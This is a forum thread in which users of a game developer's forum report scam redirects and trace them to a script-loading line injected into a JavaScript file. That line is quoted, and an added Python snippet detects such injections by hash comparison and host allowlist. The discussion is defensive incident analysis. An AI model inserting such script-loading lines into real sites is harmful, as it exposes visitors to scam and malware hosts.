#650502 18/10/18 12:49 AM
Joined: Nov 2016
C
Bugfinder General
OP Offline
I keep getting redirected to a site claiming I won some sort of Amazon rebate - only happens when I click on a thread within the forum. Is this by design or have we been hacked?

Joined: Sep 2016
stranger
Offline
I got this too! Another user in one of the support forums thinks it might be an infected image, since this forum lets people link to any url for their profile avatar, which seems like a really bad idea.

For the record, I am using Chrome.

Time to clear the browser cache at least.

Last edited by DuchessOfKvetch; 18/10/18 05:43 PM.
Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
There seems to be a dodgy-looking script linking to qqtx.me: I don't know its provenance and after I flagged it, it's being "looked into" but personally I would (and have) nuke it with NoScript or similar.


I like cheese.
Joined: Sep 2016
stranger
Offline
This is happening again today, even though it was cleaned up yesterday afternoon. Could be a compromised login account posting injected script to a forum post? Or using it in their avatar url?

There is a newer version of UBB btw (7.6), they keep patching more XSS vulnerabilities!

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
I'm afraid I'm as in the dark as you are; I only have the most basic admin access to get rid of problem users, but it seems one of the javascript files was modified at some point recently. Still waiting on an update as to what's behind it. But without knowing its history it could be a red herring.


Joined: Sep 2016
stranger
Offline
Can you at least update the site's js files? Because you don't have any security on your static files, they're easily viewable to the public (true enough for a lot of sites' js files, but generally opens one up even more to hackers).

So I can see a line that shouldn't be there in http://larian.com/forums/ubb_js/quickquote.js?v=7.5.8, midway down:

document.writeln("***** src=\'//om.qqtx.me/jquery.jscroll.min.js\'></*****>");
(script tags scrubbed for safety)

Now, how someone has modified this file is another story, as there could be a MITM attack going on, especially if the local server's copy is clean, but the one we're downloading as clients is NOT. If you restore with the original UBB script file, does the issue come back?
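
The check discussed in the post above, as an added example that is not part of the original thread or of UBB: it compares a served script against a known-good hash and reports any `document.write`/`document.writeln` call that loads from a host outside an allowlist. The function names, the allowlist and the stand-in "clean" file are assumptions; the flagged line is the one quoted in the post, tags still scrubbed.

```python
import hashlib
import re
from urllib.parse import urlparse

# document.write(...) / document.writeln(...), capturing the argument text.
WRITE_CALL = re.compile(r"document\.write(?:ln)?\s*\((.*?)\)\s*;", re.S)
# src= with an optional backslash-escaped quote, capturing the URL.
SRC_ATTR = re.compile(r"""src\s*=\s*\\?["']?([^"'\\\s>]+)""", re.I)


def injected_hosts(js_source, allowed_hosts):
    """Return (line_number, host) for each document.write[ln] call that
    pulls a resource from a host outside allowed_hosts."""
    findings = []
    for call in WRITE_CALL.finditer(js_source):
        line_no = js_source.count("\n", 0, call.start()) + 1
        for url in SRC_ATTR.findall(call.group(1)):
            # urlparse also handles protocol-relative //host/path URLs;
            # relative paths have no hostname and are skipped.
            host = urlparse(url).hostname
            if host and host.lower() not in allowed_hosts:
                findings.append((line_no, host.lower()))
    return findings


def matches_baseline(served_bytes, baseline_sha256):
    """True when the served file is byte-identical to the vendor original."""
    return hashlib.sha256(served_bytes).hexdigest() == baseline_sha256


# Constructed sample: a stand-in for a clean forum script, then the same
# file with the line quoted in the post appended.
CLEAN = "function quickQuote(id) {\n  return id;\n}\n"
TAMPERED = CLEAN + (
    'document.writeln("***** src=\\\'//om.qqtx.me/jquery.jscroll.min.js\\\'></*****>");\n'
)
BASELINE = hashlib.sha256(CLEAN.encode()).hexdigest()
ALLOWED = {"larian.com"}  # assumption: the only host the forum should load from

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, matches_baseline(text.encode(), BASELINE),
              injected_hosts(text, ALLOWED))
```

Running the same two checks on the copy stored on the server and on the copy a browser receives separates a modified file on disk from tampering in transit.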

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
I'm afraid I can't: I only have access to the bit of the CP that deals with user accounts and no access at all to the server itself, frustratingly. I am concerned about the integrity of the server but I have no means of ascertaining the current situation but it does seem that multiple js files are affected. Speaking personally I would've shut down the whole thing until I figured out the source of the problem but that's beyond my control.


Joined: Nov 2016
C
Bugfinder General
OP Offline
RE: "I would've shut down the whole thing until I figured out the source of the problem"

Looks like they heard you :)

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
I can be quite annoying when required. :D



Moderated by  ForkTong, Larian_QA, Lar_q, Lynn, Macbeth 

Powered by UBB.threads™ PHP Forum Software 7.7.5